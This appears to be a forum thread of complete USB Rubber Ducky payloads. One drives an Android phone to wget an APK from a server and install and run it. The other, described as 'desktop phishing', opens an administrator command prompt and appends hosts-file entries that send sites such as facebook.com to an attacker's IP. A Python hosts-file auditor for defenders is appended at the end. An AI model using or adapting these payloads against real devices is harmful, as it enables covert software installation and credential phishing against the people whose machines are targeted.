
KoryusaiKun


  1. Hi Guys n' Girls,

     Here's my first payload in a while. What it does is it opens the Play Store, searches for terminal emulator, installs it from the store, opens it. Now wgets a file (I used kos's AntiGuard.apk hosted locally, it's the apk I had to hand :) ) then takes you to the install wizard, installs it, then runs it. All in about 20 seconds. :)

     It could be quicker. This should work on most devices 4.0 and above; I have only tried it on my Samsung Galaxy Note II N7100 running Android v4.1.1. You may just have to tweak a few things, like the download URL and the file URI.

     Here is a demo as promised:

     This script was very annoying solely because of launching the Android install wizard. If you use it please say thanks.

     ```
     REM ----------------------------------------------------
     REM Terminal emulator wget install and run V1.0
     REM Tested on Samsung Galaxy note II Android V4.1.1
     REM Koryusai-Kun
     REM ----------------------------------------------------
     DELAY 3000
     DELAY 100
     ESCAPE
     ESCAPE
     ESCAPE
     ESCAPE
     ESCAPE
     ESCAPE
     REM open google search
     CTRL z
     DELAY 1200
     REM open play store
     STRING play store
     DELAY 1000
     DOWN
     DOWN
     DOWN
     DOWN
     ENTER
     DELAY 2000
     REM Start Search for 'Terminal Emulator'
     STRING t
     DELAY 75
     STRING e
     DELAY 75
     STRING r
     DELAY 75
     STRING m
     DELAY 75
     STRING i
     DELAY 75
     STRING n
     DELAY 75
     STRING a
     DELAY 75
     STRING l emulator
     DELAY 500
     ENTER
     REM Select 'Terminal Emulator', Install and open
     DELAY 1000
     DOWN
     DOWN
     DELAY 50
     ENTER
     DELAY 300
     DOWN
     RIGHT
     ENTER
     DELAY 500
     DOWN
     DOWN
     ENTER
     DELAY 300
     ENTER
     DELAY 2000
     DOWN
     DOWN
     RIGHT
     ENTER
     DELAY 800
     REM Change Dir to /mnt/sdcard/
     STRING cd ..
     DELAY 50
     ENTER
     STRING cd ..
     DELAY 50
     ENTER
     STRING cd mnt
     DELAY 50
     ENTER
     STRING cd sdcard
     DELAY 50
     ENTER
     DELAY 50
     REM wget the file and open the android package install wizard
     STRING wget http://192.168.1.103/AntiGuard.apk; am start -a android.intent.action.MAIN -n com.android.packageinstaller/.PackageInstallerActivity -d file:////mnt//sdcard//AntiGuard.apk
     ENTER
     REM Go through the install then open the application
     DELAY 2500
     DOWN
     DELAY 200
     DOWN
     DELAY 200
     ENTER
     DELAY 1500
     DOWN
     DELAY 500
     DOWN
     DELAY 500
     DOWN
     DELAY 500
     ENTER
     ```
  2. You replace [WEBSITE_ADDRESS] with the website, like www.facebook.com, and the second with facebook.com, then you put the evil server IP where [EVIL_SERVER_IP] is. Here's an example:

     ```
     ...
     REM ---[END]----------------------------------------------
     DELAY 300
     REM ---[Inject into the host file]------------------------
     STRING copy con inject.bat
     ENTER
     STRING SET NEWLINE=^& echo.
     ENTER
     ENTER
     STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts
     ENTER
     STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts
     ENTER
     ENTER
     STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts
     ENTER
     STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts
     ENTER
     CONTROL z
     ENTER
     STRING inject.bat
     ENTER
     REM ---[END]----------------------------------------------
     ...
     ```
  3. Hi everyone,

     This is my first post and first script for the rubber duck. I have not yet tested this script as I am still waiting to receive it here in the UK. I got it from when I was talking to my friend about something he called desktop phishing. It basically replaces, say, Facebook's or any other site's IP with your chosen server's IP in the host file. Anyway, here's the script:

     ```
     REM Author: .:Koryusai-Kun:.
     REM Description: Used for phishing, it adds an ip of your choosing to the hosts file on windows
     REM Description: so when the user types into their web browser for example www.facebook.com it
     REM Description: instead of going to the proper ip it goes to the one in the host file your evil one.
     REM Description: you need to add the www. version and without it as well.
     REM ---[Start CMD as administrator]-----------------------
     GUI
     DELAY 50
     STRING cmd
     DELAY 150
     MENU
     DELAY 75
     STRING a
     ENTER
     DELAY 200
     LEFT
     ENTER
     STRING cls
     ENTER
     REM ---[END]----------------------------------------------
     DELAY 300
     REM ---[Inject into the host file]------------------------
     STRING copy con inject.bat
     ENTER
     STRING SET NEWLINE=^& echo.
     ENTER
     ENTER
     STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
     ENTER
     STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
     ENTER
     ENTER
     STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
     ENTER
     STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
     ENTER
     CONTROL z
     ENTER
     STRING inject.bat
     ENTER
     REM ---[END]----------------------------------------------
     DELAY 200
     STRING exit
     ENTER
     ```
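
For defenders, the hosts-file change described in posts 2 and 3 leaves a durable artifact: active entries for names that should resolve through DNS. The audit below is an added example, not part of the original posts; `audit_hosts`, the `EXPECTED_NAMES` allowlist and the sample file contents are assumptions constructed for illustration.

```python
import ipaddress

# Names a stock hosts file normally carries (assumption; extend for your environment).
EXPECTED_NAMES = frozenset({"localhost", "localhost.localdomain",
                            "ip6-localhost", "ip6-loopback", "broadcasthost"})

def audit_hosts(text, expected=EXPECTED_NAMES):
    """Return (line, address, hostname, kind) for every active entry that
    overrides name resolution for a hostname outside the expected set."""
    findings = []
    for lineno, raw in enumerate(text.lstrip("\ufeff").splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()   # drop comments, then tokenise
        if len(fields) < 2:
            continue                            # blank, comment-only or no hostname
        addr, names = fields[0], fields[1:]
        try:
            ip = ipaddress.ip_address(addr.split("%", 1)[0])  # ignore IPv6 zone id
        except ValueError:
            findings.append((lineno, addr, " ".join(names), "malformed-address"))
            continue
        for name in names:
            host = name.lower().rstrip(".")     # hostnames are case-insensitive
            if host in expected:
                continue
            # Loopback/unspecified targets block a site; anything else reroutes it.
            kind = "local-sinkhole" if ip.is_loopback or ip.is_unspecified else "redirect"
            findings.append((lineno, str(ip), host, kind))
    return findings

# Constructed sample: documentation addresses and example domains, not real data.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost

203.0.113.10 www.example.com
203.0.113.10 example.com   # entry appended after the stock content
127.0.0.1 WWW.Example.org
"""

if __name__ == "__main__":
    for lineno, addr, host, kind in audit_hosts(SAMPLE_HOSTS):
        print(f"line {lineno}: {host} -> {addr} [{kind}]")
```

On Windows, read `%WINDIR%\system32\drivers\etc\hosts` and pass its text to `audit_hosts`; compare each finding against entries you placed deliberately, and baseline the file so later appends stand out.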